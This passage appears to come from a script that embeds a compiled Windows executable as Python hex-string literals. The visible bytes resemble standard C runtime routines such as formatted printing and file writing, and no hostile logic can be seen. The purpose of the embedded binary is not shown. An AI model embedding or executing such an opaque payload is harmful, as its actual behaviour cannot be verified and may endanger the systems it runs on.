'8945f88d45f064a300000000c38b4df064890d00000000595f5f5e5b8be55' \ 'd51c3cccccccccccccc558bec83ec18538b5d0c56578b7b08333d60634200' \ 'c645ff00c745f4010000008b078d731083f8fe740d8b4f0403ce330c30e86' \ '2a3ffff8b4f0c8b470803ce330c30e852a3ffff8b4508f64004660f85d000' \ '00008945e88b45108945ec8d45e88943fc8b430c8945f883f8fe0f84ee000' \ '0008d04408d40048b4c87048b1c878d04878945f085c9747b8bd6e8a24c00' \ '<KEY>' \ '7410000741f68c4c74100e8535a000083c40485c0740e6a01ff7508ff15c4' \ 'c7410083c4088b55088b4d0ce8854c00008b450c8b55f839500c741068606' \ '34200568bc8e8864c00008b450c89580c8b0783f8fe7475eb668a4dff8bc3' \ '895df883fbfe0f855dffffff84c97447eb21c745f400000000eb18837b0cf' \ 'e74366860634200568bcbbafeffffffe83f4c00008b0783f8fe740d8b4f04' \ '03ce330c30e849a2ffff8b4f0c8b570803ce330c32e839a2ffff8b45f45f5' \ 'e5b8be55dc38b4f0403ce330c30e822a2ffff8b4f0c8b470803ce330c30e8' \ '12a2ffff8b4df08bd68b4908e8b54b0000cc6a6468402e4200e8fffdffff6' \ 'a0be8380300005933db895dfc6a406a205f57e8a004000059598bc8894ddc' \ '85c9751b6afe8d45f0506860634200e86c4a000083c40c83c8ffe95502000' \ '0a3e0744200893dd080420005000800003bc8733166c74104000a8309ff89' \ '5908806124808a4124247f88412466c741250a0a89593888593483c140894' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '0c50ff15aca14100ff46088b55e08b4de447897dd48b45d8408945d883c20' \ '48955e0eb86890cb5e0744200013dd08042008b04b5e07442000500080000' \ '3bc8732466c74104000a8309ff8959088061248066c741250a0a895938885' \ '93483c140894ddcebcc468975d08b4de4e906ffffff895dd483fb030f8db8' \ '0000008bf3c1e6060335e07442008975dc833eff7413833efe740e0fbe460' \ '40c80884604e98c000000c646048185db75056af658eb0a8d43fff7d81bc0' \ '83c0f550ff15cca041008bf883ffff744585ff744157ff1580a0410085c07' \ '436893e25ff00000083f80275080fbe46040c40eb0b83f80375090fbe4604' \ '0c0888460468a00f00008d460c50ff15aca14100ff4608eb220fbe46040c4' \ '0884604c706feffffffa15c81420085c0740a8b0498c74010feffffff43e9' \ '3cffffffc745fcfeffffffe80800000033c0e8acfbffffc36a0be80302000' \ '059c36a1068602e4200e851fbffff33ff897de46a01e88500000059217dfc' \ '6a035e8975e03b35608142007d53a15c8142008b04b085c07444f6400c837' \ '41050e8e85700005983f8ff740447897de483fe147c29a15c8142008b04b0' \ '83c02050ff159ca14100a15c814200ff34b0e853c8ffff59a15c814200832' \ '4b00046eba2c745fcfeffffffe80b0000008bc7e812fbffffc38b7de46a01' \ 'e86601000059c3558bec568b7508833cf5906c420000751356e8710000005' \ '985c075086a11e87d02000059ff34f5906c4200ff15e8a041005e5dc35657' \ 'be906c42008bfe538b1f85db7417837f0401741153ff159ca1410053e8cfc' \ '7ffff8327005983c70881ffb06d42007cd85b833e00740e837e04017508ff' \ '36ff159ca1410083c60881feb06d42007ce25f5ec36a0868802e4200e82cf' \ 'affff833d9c7d4200007518e8102c00006a1ee8692c000068ff000000e8d7' \ '01000059598b7d08833cfd906c420000755b6a18e8fa000000598bf085f67' \ '50fe80ce7ffffc7000c00000033c0eb416a0ae81affffff598365fc00833c' \ 'fd906c420000751568a00f000056ff15aca141008934fd906c4200eb0756e' \ '816c7ffff59c745fcfeffffffe80900000033c040e8e0f9ffffc36a0ae837' \ '00000059c35657be906c4200bfe0754200837e04017512893e68a00f0000f' \ 'f3683c718ff15aca1410083c60881feb06d42007cdd33c05f405ec3558bec' \ '8b4508ff34c5906c4200ff15eca041005dc3558bec565733f66a00ff750cf' \ 'f7508e8775600008bf883c40c85ff7527390530774200761f56ff1500a141' \ '<KEY>' \ '3558bec5356578b3d3077420033f6ff7508e8b8e6ffff8bd85985db752585' \ '<KEY>' \ '<KEY>' \ '8bf8595985ff752c39450c7427390530774200761f56ff1500a141008d86e' \ '<KEY>' \ '518d45fc506894bc41006a00ff1588a0410085c0741768acbc4100ff75fcf' \ 'f15a4a0410085c07405ff7508ffd0c9c3558becff7508e8c3ffffff59ff75' \ '08ff1584a04100cc558bece80a2a0000ff7508e8622a00005968ff000000e' \ '8b0000000cc6a016a016a00e84001000083c40cc36a016a006a00e8310100' \ '0083c40cc3558bec833dc480420000741968c4804200e8405300005985c07' \ '40aff7508ff15c480420059e8b152000068e4a2410068cca24100e8c00000' \ '00595985c075505657685a584100e8c1b3ffff59bea0a24100bfc8a24100e' \ 'b0b8b0685c07402ffd083c6043bf772f1833db8804200005f5e741b68b880' \ '4200e8da5200005985c0740c6a006a026a00ff15b880420033c05dc3558be' \ 'c6a006a01ff7508e88d00000083c40c5dc3566a00ff15f4a141008bf056e8' \ '74e6ffff56e8a4e3ffff56e8932b000056e828bdffff56e8e354000056e81' \ 'd36000083c4185ee91ee7ffff558bec568b7508eb0b8b0685c07402ffd083' \ 'c6043b750c72f05e5dc3558bec568b750833c0eb0f85c075108b0e85c9740' \ '2ffd183c6043b750c72ec5e5dc36a08e804fcffff59c36a08e85ffdffff59' \ 'c36a1c68a02e4200e8adf6ffff6a08e8e6fbffff598365fc00833d4877420' \ '0010f84c9000000c7053c774200010000008a4510a238774200837d0c000f' \ '859c000000ff35c08042008b35f8a14100ffd68bd8895dd485db7474ff35b' \ 'c804200ffd68bf8895de4897de0897ddc83ef04897ddc3bfb72576a00ff15' \ 'f4a14100390774ea3bfb7247ff37ffd68bf06a00ff15f4a141008907ffd6f' \ 'f35c08042008b35f8a14100ffd68945d8ff35bc804200ffd68b4dd8394de4' \ '75053945e074ae894de48bd9895dd48945e08bf8eb9c68fca2410068e8a24' \ '100e8d5feffff59596804a341006800a34100e8c4feffff5959c745fcfeff' \ 'ffffe820000000837d10007529c70548774200010000006a08e84cfcffff5' \ '9ff7508e869fdffff837d100074086a08e836fcffff59c3e8d0f5ffffc355' \ '8bec6a006a00ff7508e8c2feffff83c40c5dc36a1468c02e4200e86af5fff' \ 'f8b7d0883fffe7510e87ee2ffffc70009000000e9b900000085ff0f88a100' \ '00003b3dd08042000f83950000008bc7c1f8058945e08bdf83e31fc1e3068' \ 'b0485e07442000fbe44030483e001747457e8ef5400005933f68975fc8b45' \ 'e08b0485e0744200f644030401742857e8e45500005950ff1508a1410085c' \ '07508ff15c0a041008bf08975e485f67418e8c7e1ffff8930e8f4e1ffffc7' \ '000900000083ceff8975e4c745fcfeffffffe80a0000008bc6eb218b7d088' \ 'b75e457e8fc55000059c3e8c5e1ffffc70009000000e84be1ffff83c8ffe8' \ 'd6f4ffffc36a1068e02e4200e884f4ffff8b750883fefe7518e864e1ffff8' \ '32000e890e1ffffc70009000000e9ad00000085f60f888d0000003b35d080' \ '42000f83810000008bdec1fb058bfe83e71fc1e7068b049de07442000fbe4' \ '4380483e001746356e804540000598365fc008b049de0744200f644380401' \ '7413ff7510ff750c56e85f00000083c40c8bf8eb16e822e1ffffc70009000' \ '000e8e3e0ffff83200083cfff897de4c745fcfeffffffe80a0000008bc7eb' \ '298b75088b7de456e82255000059c3e8b7e0ffff832000e8e3e0ffffc7000' \ '9000000e869e0ffff83c8ffe8f4f3ffffc3558becb8f01a0000e8014b0000' \ 'a16063420033c58945fc8b45088b4d0c33d2578bfa898540e5ffff898d44e' \ '5ffff89bd3ce5ffff89952ce5ffff395510750733c0e9d707000085c9751f' \ 'e84ce0ffff2138e879e0ffffc70016000000e8ffdfffff83c8ffe9b407000' \ '053568bc8c1f9058bf083e61fc1e606898d30e5ffff8b0c8de074420089b5' \ '14e5ffff8a5c0e2402dbd0fb80fb02740580fb01752b8b4510f7d0a801751' \ 'ce8f0dfffff2138e81de0ffffc70016000000e8a3dfffffe94c0700008b85' \ '40e5fffff6440e0420740d6a02525250e84855000083c410ffb540e5ffffe' \ '8954b00005985c00f84180300008b8530e5ffff8b0485e0744200f6440604' \ '800f8400030000e8f2daffff8b406c33c93988a80000008d851ce5ffff508' \ 'b8530e5ffff0f94c18b0485e0744200ff3406898d40e5ffffff15f4a04100' \ '85c00f84c202000039bd40e5ffff740884db0f84b2020000ff158ca041008' \ 'b9544e5ffff21bd24e5ffff8bca898510e5ffff898d34e5ffff397d100f86' \ '7e02000033c0898538e5ffffc78518e5ffff0a00000084db0f858f0100008' \ 'a0933c080f90a0f94c0898540e5ffff8b8530e5ffff8b1485e0744200837c' \ '16380074178a4416348845f46a028d45f4884df5836416380050eb5a0fbec' \ '150e82497ffff5985c074448b8544e5ffff8b9534e5ffff2bc203451083f8' \ '010f86d30100006a02528d853ce5ffff50e87a55000083c40c83f8ff0f84d' \ 'b0100008b8534e5ffff40ff8538e5ffffeb266a01ffb534e5ffff8d853ce5' \ 'ffff50e84b55000083c40c83f8ff0f84ac0100008b8534e5ffff33c951514' \ '0ff8538e5ffff6a05898534e5ffff8d45f4506a018d853ce5ffff5051ffb5' \ '10e5ffffff15bca1410089851ce5ffff85c00f846b0100006a008d8d24e5f' \ 'fff51508d45f4508b8530e5ffff8b0485e0744200ff3406ff1504a1410085' \ 'c00f84eb0400008bbd38e5ffff8b851ce5ffff03bd2ce5ffff398524e5fff' \ 'f0f8c2101000083bd40e5ffff000f84da0000006a008d8524e5ffff506a01' \ '8d45f4508b8530e5ffffc645f40d8b0485e0744200ff3406ff1504a141008' \ '5c00f848f04000083bd24e5ffff010f8cd6000000ff852ce5ffff47e99000' \ '000080fb01740580fb0275330fb70133d2663b8518e5ffff89853ce5ffff8' \ 'b8538e5ffff0f94c283c10283c002898d34e5ffff898538e5ffff899540e5' \ 'ffff80fb01740580fb027555ffb53ce5ffffe82354000059663b853ce5fff' \ 'f0f851604000083c70283bd40e5ffff0074246a0d585089853ce5ffffe8fa' \ '53000059663b853ce5ffff0f85ed03000047ff852ce5ffff8b8538e5ffff8' \ 'b8d34e5ffff3b45100f82c4fdffffeb238b9d30e5ffff8a028b0c9de07442' \ '004788440e348b049de0744200c7440638010000008bb540e5ffffe9a9030' \ '0008bb540e5ffffe9a80300008b8530e5ffff8b0485e0744200f644060480' \ '0f84550300008b9544e5ffff33f689b538e5ffff84db0f85e10000008bc28' \ '9853ce5ffff3975100f869103000033c92bc28b953ce5ffff8d9d48e5ffff' \ '898d40e5ffff3b451073448a0a4240888d23e5ffff80f90a8b8d40e5ffff8' \ '9953ce5ffff750bff852ce5ffffc6030d43418a9523e5ffff88138b953ce5' \ 'ffff4341898d40e5ffff81f9ff13000072b78b8d14e5ffff8d8548e5ffff2' \ 'bd86a008d8528e5ffff50538d8548e5ffff508b8530e5ffff8b0485e07442' \ '00ff3401ff1504a1410085c00f84bb02000003bd28e5ffff8b9544e5ffff3' \ '99d28e5ffff0f8cb10200008b853ce5ffff2bc23b45108b853ce5ffff0f82' \ '35ffffffe9950200008bca80fb020f85fe000000898d40e5ffff3975100f8' \ '6a7020000c78518e5ffff0a00000083a51ce5ffff008bbd2ce5ffff8bc12b' \ 'c28b951ce5ffff8d9d48e5ffff3b4510733e0fb73183c10283c002898d40e' \ '5ffff663bb518e5ffff75156a0d5966890b8b8d40e5ffff83c70283c30283' \ 'c20266893383c20283c30281fafe13000072bd8b8d14e5ffff8d8548e5fff' \ 'f2bd86a008d8528e5ffff50538d8548e5ffff508b8530e5ffff89bd2ce5ff' \ 'ff8b0485e0744200ff3401ff1504a141008bb538e5ffff8bbd3ce5ffff85c' \ '00f84b401000003bd28e5ffff8b9544e5ffff89bd3ce5ffff399d28e5ffff' \ '0f8ca40100008b8d40e5ffff8bc12bc23b45100f8220ffffffe98c0100008' \ 'b5d10898d24e5ffff85db0f84a7010000c78518e5ffff0a00000083a51ce5' \ 'ffff008bb524e5ffff2bca8b951ce5ffff8d8548f9ffff3bcb733b0fb73e8' \ '3c60283c10289b524e5ffff663bbd18e5ffff75126a0d5e6689308bb524e5' \ 'ffff83c00283c20266893883c20283c00281faa806000072c133f65656685' \ '50d00008d8df0ebffff518d8d48f9ffff2bc1992bc2d1f8508bc1505668e9' \ 'fd0000ff15bca141008bb538e5ffff8bbd3ce5ffff898534e5ffff85c00f8' \ '4c200000033c9898d40e5ffff6a002bc18d9528e5ffff52508d85f0ebffff' \ '03c18b8d14e5ffff508b8530e5ffff8b0485e0744200ff3401ff1504a1410' \ '085c0741e8b8d40e5ffff038d28e5ffff8b8534e5ffff898d40e5ffff3bc1' \ '7fafeb1aff15c0a041008b8d40e5ffff8bf08b8534e5ffff89b538e5ffff3' \ 'bc17f518b8d24e5ffff8b9544e5ffff8bf92bfa89bd3ce5ffff3bfb0f82c8' \ 'feffffeb376a008d8d28e5ffff51ff7510ffb544e5ffffff3406ff1504a14' \ '10085c0740a8bbd28e5ffff33f6eb08ff15c0a041008bf08b9544e5ffff85' \ 'ff756385f674246a055b3bf37514e80fd9ffffc70009000000e8d0d8ffff8' \ '918eb3f56e8d9d8ffff59eb368b8530e5ffff8b8d14e5ffff8b0485e07442' \ '00f6440104407409803a1a750433c0eb20e8cfd8ffffc7001c000000e890d' \ '8ffff83200083c8ffeb082bbd2ce5ffff8bc75e5b8b4dfc33cd5fe87f8fff' \ 'ffc9c3a1b06d420083f8ff740c83f8fe740750ff15c4a04100c333c050506' \ 'a03506a0368000000c068bcbc4100ff1514a14100a3b06d4200c3558bec56' \ 'e8aed3ffff8bf085f60f84450100008b565c578b7d088bca3939740d83c10' \ 'c8d82900000003bc872ef8d82900000003bc873043939740233c985c90f84' \ '100100008b510885d20f840501000083fa05750c8361080033c040e9f6000' \ '00083fa01750883c8ffe9e90000008b450c538b5e60894660837904080f85' \ 'c00000006a245f8b465c83c70c836407fc0081ff900000007ced81398e000' \ '0c08b7e64750cc7466483000000e9860000008139900000c07509c7466481' \ '000000eb758139910000c07509c7466484000000eb648139930000c07509c' \ '7466485000000eb5381398d0000c07509c7466482000000eb4281398f0000' \ 'c07509c7466486000000eb318139920000c07509c746648a000000eb20813' \ '9b50200c07509c746648d000000eb0f8139b40200c07507c746648e000000' \ 'ff76646a08ffd259897e64eb09ff710483610800ffd259895e6083c8ff5be' \ 'b0233c05f5e5dc3558bec837d08007515e806d7ffffc70016000000e88cd6' \ 'ffff83c8ff5dc3ff75086a00ff359c7d4200ff15dca141005dc3cccc53568' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '4e33d28bc65e5bc21000558becb8ffff000083ec14663945080f849b00000' \ '056ff750c8d4dece8cc8dffff8b75ec8b86a800000085c075188b4d088d41' \ 'bf6683f81977046683c1200fb7c10fb7c0eb1fba000100006a01663955087' \ '32aff7508e889cfffff595985c075090fb745080fb7c0eb0e0fb74d088b86' \ '940000000fb604080fb7c0eb1c8d4dfc516a018d4d08515250e82dd7ffff8' \ '3c41885c075090fb745080fb7c0eb040fb745fc807df8005e74078b4df483' \ '<KEY>' \ '50c578b7d14ff75108985d8fbffff33c08bd88d8db0fbffff89b5f8fbffff' \ '89bdf4fbffff8985acfbffff899df0fbffff8985dcfbffff8985e8fbffff8' \ '985d4fbffff8985c0fbffff8985d0fbffffe8ce8cffffe855d5ffff89859c' \ 'fbffff399dd8fbffff752ae842d5ffffc70016000000e8c8d4ffff389dbcf' \ 'bffff740a8b85b8fbffff836070fd83c8ffe9150b000085f674d233c98bc1' \ '8bd1898dccfbffff898da8fbffff0fb70e8985e0fbffff8995ecfbffff898' \ 'de4fbffff6685c90f84ce0a00008bb594fbffffc7858cfbffff58000000c7' \ '8584fbffff64000000c78580fbffff69000000c78598fbffff6f000000838' \ '5f8fbffff0285c00f88910a00006a588d41e05f663bc7770f0fb7c10fbe80' \ '18bc410083e00feb0233c08bbdccfbffff0fbebcc738bc41008bc7c1f8048' \ '9bdccfbffff8bbdf4fbffff8985ccfbffff83f8070f87290a0000ff2485b6' \ '3f410033c0838de8fbffffff8bd88985a0fbffff8985c0fbffff8985dcfbf' \ 'fff8985d4fbffff899df0fbffff8985d0fbffffe9ee0900000fb7c16a2059' \ '2bc1744683e803743983e808742f4848741d83e8038b85f8fbffff0f85cd0' \ '9000083cb08899df0fbffffe9bf09000083cb04899df0fbffffe9ab090000' \ '83cb01ebf081cb80000000ebe883cb02ebe36a2a58663bc8752f8b0783c70' \ '489bdf4fbffff8985dcfbffff85c00f897809000083cb04f7d8899df0fbff' \ 'ff8985dcfbffffe9620900008b85dcfbffff6bc00a8985dcfbffff0fb7c18' \ 'b8ddcfbffff83c1d003c8898ddcfbffffe93a09000033c08985e8fbffffe9' \ '2d0900006a2a58663bc8752b8b0783c7048985e8fbffff85c08b85f8fbfff' \ 'f89bdf4fbffff0f890c090000838de8fbffffffe9000900008b85e8fbffff' \ '6bc00a8985e8fbffff0fb7c18b8de8fbffff83c1d003c8898de8fbffffe9d' \ '20800000fb7c183f849745783f86874486a6c593bc1741a83f8778b85f8fb' \ 'ffff0f85b508000081cb00080000e9e0feffff8b85f8fbffff66390875148' \ '3c0028985f8fbffff81cb00100000e9c1feffff83cb10e9b9feffff6a2058' \ '0bd8e9bdfeffff8b85f8fbffff0fb70083f83675238bbdf8fbffff66837f0' \ '23475168bc783c0048985f8fbffff81cb00800000e97efeffff83f8337523' \ '8bbdf8fbffff66837f023275168bc783c0048985f8fbffff81e3ff7fffffe' \ '956feffff663b8584fbffff0f840d080000663b8580fbffff0f8400080000' \ '663b8598fbffff0f84f307000083f8750f84ea07000083f8780f84e107000' \ '0663b858cfbffff0f84d407000033c08985ccfbffff8d85e0fbffff50ffb5' \ 'd8fbffffc785d0fbffff0100000051e83d08000083c40ce9a10700000fb7c' \ '183f8640f8f2b0200000f84b302000083f8530f8f27010000747d83e84174' \ '10484874584848740848480f859c0500006a205803c8c785a0fbffff01000' \ '000898de4fbffff8b85e8fbffff83cb40ba00020000899df0fbffff8db5fc' \ 'fbffff8995ecfbffff85c00f8990020000c785e8fbffff06000000e9e1020' \ '000f7c3300800000f85da0000006a20580bd8899df0fbffffe9ca000000f7' \ 'c330080000750b6a20580bd8899df0fbffff8b85e8fbffffbfffffff7f83f' \ '8ff74028bf88bb5f4fbffff83c60489b5f4fbffff8b76fcf6c3200f84c104' \ '000085f675068b35486c420033c98bc68bd18985e4fbffff8995ecfbffff8' \ '5ff0f8ed00400008a0084c00f84c60400008d8db0fbffff0fb6c05150e8c4' \ '88ffff5985c08b85e4fbffff597401408b95ecfbffff40428985e4fbffff8' \ '995ecfbffff3bd77cc1e98c04000083e8580f84dc02000048480f848b0000' \ '0083e8070f84ebfeffff48480f856a0400000fb70783c704c785d0fbffff0' \ '100000089bdf4fbffff8985a4fbfffff6c32074448885c4fbffff33c08885' \ 'c5fbffff8d85b0fbffff508b85b0fbffffff70748d85c4fbffff508d85fcf' \ 'bffff50e8ed45000083c41085c07913c785c0fbffff01000000eb07668985' \ 'fcfbffff33d28db5fcfbffff42e9ea0300008b0783c70489bdf4fbffff85c' \ '074368b700485f6742ff7c30008000074170fbf00992bc28bd0c785d0fbff' \ 'ff01000000e9b30300000fbf1033c9898dd0fbffffe9a50300008b35486c4' \ '20056e810b7ffff598bd0e99103000083f8700f8feb0100000f84d7010000' \ '83f8650f8c7f03000083f8670f8eeffdffff6a69593bc1746683f86e74276' \ 'a6f593bc10f855f030000c785e4fbffff0800000084db795b81cb00020000' \ '899df0fbffffeb4d83c70489bdf4fbffff8b7ffce8b29effff85c00f84430' \ '500008b85e0fbfffff6c3207405668907eb028907c785c0fbffff01000000' \ 'e9c304000083cb40899df0fbffffc785e4fbffff0a000000f7c3008000007' \ '50cf7c3001000000f84970100008b0f83c70889bdf4fbffff8b7ffce9b001' \ '000075146a6758663bc87556c785e8fbffff01000000eb4a3bc27e088bc28' \ '985e8fbffff3da30000007e378db85d01000057e88ee8ffff598b8de4fbff' \ 'ff8985a8fbffff85c0740a8bf089bdecfbffffeb0ac785e8fbffffa300000' \ '08bbdf4fbffff8b0783c708898578fbffff8b47fc89857cfbffff8d85b0fb' \ 'ffff50ffb5a0fbffff0fbec1ffb5e8fbffff89bdf4fbffff50ffb5ecfbfff' \ 'f8d8578fbffff5650ff35786e4200ff15f8a14100ffd08bfb83c41c81e780' \ '000000742183bde8fbffff0075188d85b0fbffff5056ff35846e4200ff15f' \ '8a14100ffd059596a6758663985e4fbffff751c85ff75188d85b0fbffff50' \ '56ff35806e4200ff15f8a14100ffd05959803e2d0f851efeffff81cb00010' \ '000899df0fbffff46e90cfeffffc785e8fbffff080000006a07eb1c83e873' \ '0f8479fcffff48480f8492feffff83e8030f85890100006a27588985acfbf' \ 'fffc785e4fbffff1000000084db0f8978feffff6a305983c05166898dc8fb' \ 'ffff668985cafbffffc785d4fbffff02000000e955feffff83c70489bdf4f' \ 'bfffff6c3207411f6c34074060fbf47fceb0e0fb747fceb08f6c340740c8b' \ '47fc998bc88bfa33c0eb078b4ffc33c08bf8f6c340741c3bf87f187c043bc' \ '87312f7d913f8f7df81cb00010000899df0fbfffff7c30090000075028bf8' \ '8b95e8fbffff85d2790533d242eb1683e3f7899df0fbffff81fa000200007' \ 'e05ba000200008bc10bc775068985d4fbffff8db5fbfdffff8bc24a8995e8' \ 'fbffff85c07f068bc10bc7743d8b85e4fbffff9952505751e8e039000083c' \ '130899d94fbffff8985ecfbffff8bfa83f9397e06038dacfbffff8b95e8fb' \ 'ffff880e8b8decfbffff4eebb08b9df0fbffff8d95fbfdffff2bd6468995e' \ 'cfbfffff7c300020000744585d27405803e30743c4e6a3058880642eb2d85' \ 'f675068b354c6c4200c785d0fbffff010000008bd685ff740f33c04f66390' \ '2740783c20285ff75f32bd6d1fa8995ecfbffff83bdc0fbffff000f85ad01' \ '0000f6c3407420f7c3000100000f841d0100006a2d58668985c8fbffffc78' \ '5d4fbffff010000006a20598bbddcfbffff8b85d4fbffff2bfa2bf8f6c30c' \ '751d8d85e0fbffff50ffb5d8fbffff5751e83f0200008b85d4fbffff83c41' \ '0ffb59cfbffff8d8de0fbffff51ffb5d8fbffff508d85c8fbffff50e8e30f' \ '000083c414f6c308741ff6c304751a8d85e0fbffff50ffb5d8fbffff576a3' \ '05850e8f201000083c41083bdd0fbffff008b85ecfbffff0f85b300000085' \ 'c00f8eab0000008bce89b5e4fbffff48898594fbffff8d85b0fbffff508b8' \ '5b0fbffffff70748d85a4fbffff5150e8e040000083c410898588fbffff85' \ 'c07e678d85e0fbffff50ffb5d8fbffffffb5a4fbffffe84d0100008b8de4f' \ 'bffff038d88fbffff8b8594fbffff83c40c898de4fbffff85c07f98eb56f6' \ 'c30174076a2be9d9fefffff6c3020f84e2feffff6a205966898dc8fbffffc' \ '785d4fbffff01000000e9ccfeffff83c8ff8985e0fbffffeb23ffb59cfbff' \ 'ff8d8de0fbffff51ffb5d8fbffff5056e8dc0e000083c4148b85e0fbffff8' \ '5c0781ff6c304741a8d85e0fbffff50ffb5d8fbffff576a205850e8e60000' \ '0083c4108b85a8fbffff85c0740f50e88daaffff33c0598985a8fbffff8b9' \ '5ecfbffff8b85f8fbffff0fb7088b85e0fbffff898de4fbffff6685c90f85' \ '60f5ffff80bdbcfbffff00740a8b8db8fbffff836170fd8b4dfc5f5e33cd5' \ 'be8d380ffffc9c3e8f4c9ffffc70016000000e87ac9ffff80bdbcfbffff00' \ '0f84b7f4ffff8b8db8fbffff836170fde9a8f4ffff8bff7c3741002635410' \ '05a354100af3541000e3641001b36410076364100a1374100558bec8b450c' \ 'f6400c40740683780800741d50ff7508e89f4000005959b9ffff0000663bc' \ '175088b45108308ff5dc38b4510ff005dc3558bec568b750c85f67e1e578b' \ '7d1457ff75104eff7508e8aeffffff83c40c833fff740485f67fe75f5e5dc' \ '3558bec568b750c5756e8a7ceffff598b4e0c8bf8f6c1827517e82bc9ffff' \ 'c70009000000834e0c2083c8ffe919010000f6c140740de80fc9ffffc7002' \ '2000000ebe25333dbf6c1017413895e04f6c110747d8b460883e1fe890689' \ '4e0c8b460c83e0ef83c80289460c895e04a90c010000752ae84689ffff83c' \ '0203bf0740ce83a89ffff83c0403bf0750b57e8653400005985c0750756e8' \ '4141000059f7460c08010000747a8b56088b0e8d420189068b46182bca488' \ '94d0c89460485c97e17515257e8d0e6ffff83c40c8bd8eb4783c920894e0c' \ 'eb6883ffff741b83fffe74168bcf8bc783e11fc1f805c1e106030c85e0744' \ '200eb05b9506c4200f641042074146a02535357e8933c000023c283c41083' \ 'f8ff74258b4e088a45088801eb1633c0405089450c8d45085057e867e6fff' \ 'f83c40c8bd83b5d0c7409834e0c2083c8ffeb040fb645085b5f5e5dc3558b' \ 'ec81ec88040000a16063420033c58945fc8b450853568b750c578b7d14ff7' \ '5108985d8fbffff33c08bd88d8db4fbffff89b5f8fbffff89bdf4fbffff89' \ '85acfbffff899df0fbffff8985dcfbffff8985e8fbffff8985d4fbffff898' \ '5b0fbffff8985d0fbffffe8037fffffe88ac7ffff8985a4fbffff399dd8fb' \ 'ffff752ae877c7ffffc70016000000e8fdc6ffff389dc0fbffff740a8b85b' \ 'cfbffff836070fd83c8ffe9300b000085f674d233c98bc18bd1898dccfbff' \ 'ff898da8fbffff0fb70e8985e0fbffff8995ecfbffff898de4fbffff6685c' \ '90f84e90a00008bb594fbffffc7858cfbffff58000000c78584fbffff6400' \ '0000c78580fbffff69000000c78598fbffff6f0000008385f8fbffff0285c' \ '00f889d0a00006a588d41e05f663bc7770f0fb7c10fb68088f7410083e00f' \ 'eb0233c08bbdccfbffff6bc0090fb6bc38a8f741008bc7c1e80489bdccfbf' \ 'fff8bbdf4fbffff8985ccfbffff83f8080f84ad0a000083f8070f87290a00' \ '00ff2485b94d410033c0838de8fbffffff8bd88985a0fbffff8985b0fbfff' \ 'f8985dcfbffff8985d4fbffff899df0fbffff8985d0fbffffe9ee0900000f' \ 'b7c16a20592bc1744683e803743983e808742f4848741d83e8038b85f8fbf' \ 'fff0f85cd09000083cb08899df0fbffffe9bf09000083cb04899df0fbffff' \ 'e9ab09000083cb01ebf081cb80000000ebe883cb02ebe36a2a58663bc8752' \ '<KEY>' \ '899df0fbffff8985dcfbffffe9620900008b85dcfbffff6bc00a8985dcfbf' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '8fbffffe9d20800000fb7c183f849745783f86874486a6c593bc1741a83f8' \ '<KEY>' \ '<KEY>' \ 'ffff6a20580bd8e9bdfeffff8b85f8fbffff0fb70083f83675238bbdf8fbf' \ 'fff66837f023475168bc783c0048985f8fbffff81cb00800000e97efeffff' \ '83f83375238bbdf8fbffff66837f023275168bc783c0048985f8fbffff81e' \ '3ff7fffffe956feffff663b8584fbffff0f840d080000663b8580fbffff0f' \ '8400080000663b8598fbffff0f84f307000083f8750f84ea07000083f8780' \ 'f84e1070000663b858cfbffff0f84d407000033c08985ccfbffff8d85e0fb' \ 'ffff50ffb5d8fbffffc785d0fbffff0100000051e866faffff83c40ce9a10' \ '700000fb7c183f8640f8f2b0200000f84b302000083f8530f8f2701000074' \ '7d83e8417410484874584848740848480f859c0500006a205803c8c785a0f' \ 'bffff01000000898de4fbffff8b85e8fbffff83cb40ba00020000899df0fb' \ 'ffff8db5fcfbffff8995ecfbffff85c00f8990020000c785e8fbffff06000' \ '000e9e1020000f7c3300800000f85da0000006a20580bd8899df0fbffffe9' \ 'ca000000f7c330080000750b6a20580bd8899df0fbffff8b85e8fbffffbff' \ 'fffff7f83f8ff74028bf88bb5f4fbffff83c60489b5f4fbffff8b76fcf6c3' \ '200f84c104000085f675068b35486c420033c98bc68bd18985e4fbffff899' \ '5ecfbffff85ff0f8ed00400008a0084c00f84c60400008d8db4fbffff0fb6' \ 'c05150e8ed7affff5985c08b85e4fbffff597401408b95ecfbffff4042898' \ '5e4fbffff8995ecfbffff3bd77cc1e98c04000083e8580f84dc0200004848' \ '0f848b00000083e8070f84ebfeffff48480f856a0400000fb70783c704c78' \ '5d0fbffff0100000089bdf4fbffff89859cfbfffff6c32074448885c4fbff' \ 'ff33c08885c5fbffff8d85b4fbffff508b85b4fbffffff70748d85c4fbfff' \ 'f508d85fcfbffff50e81638000083c41085c07913c785b0fbffff01000000' \ 'eb07668985fcfbffff33d28db5fcfbffff42e9ea0300008b0783c70489bdf' \ '4fbffff85c074368b700485f6742ff7c30008000074170fbf00992bc28bd0' \ 'c785d0fbffff01000000e9b30300000fbf1033c9898dd0fbffffe9a503000' \ '08b35486c420056e839a9ffff598bd0e99103000083f8700f8feb0100000f' \ '84d701000083f8650f8c7f03000083f8670f8eeffdffff6a69593bc174668' \ '3f86e74276a6f593bc10f855f030000c785e4fbffff0800000084db795b81' \ 'cb00020000899df0fbffffeb4d83c70489bdf4fbffff8b7ffce8db90ffff8' \ '5c00f84520500008b85e0fbfffff6c3207405668907eb028907c785b0fbff' \ 'ff01000000e9c304000083cb40899df0fbffffc785e4fbffff0a000000f7c' \ '300800000750cf7c3001000000f84970100008b0f83c70889bdf4fbffff8b' \ '7ffce9b001000075146a6758663bc87556c785e8fbffff01000000eb4a3bc' \ '27e088bc28985e8fbffff3da30000007e378db85d01000057e8b7daffff59' \ '8b8de4fbffff8985a8fbffff85c0740a8bf089bdecfbffffeb0ac785e8fbf' \ 'fffa30000008bbdf4fbffff8b0783c708898578fbffff8b47fc89857cfbff' \ 'ff8d85b4fbffff50ffb5a0fbffff0fbec1ffb5e8fbffff89bdf4fbffff50f' \ 'fb5ecfbffff8d8578fbffff5650ff35786e4200ff15f8a14100ffd08bfb83' \ 'c41c81e780000000742183bde8fbffff0075188d85b4fbffff5056ff35846' \ 'e4200ff15f8a14100ffd059596a6758663985e4fbffff751c85ff75188d85' \ 'b4fbffff5056ff35806e4200ff15f8a14100ffd05959803e2d0f851efefff' \ 'f81cb00010000899df0fbffff46e90cfeffffc785e8fbffff080000006a07' \ 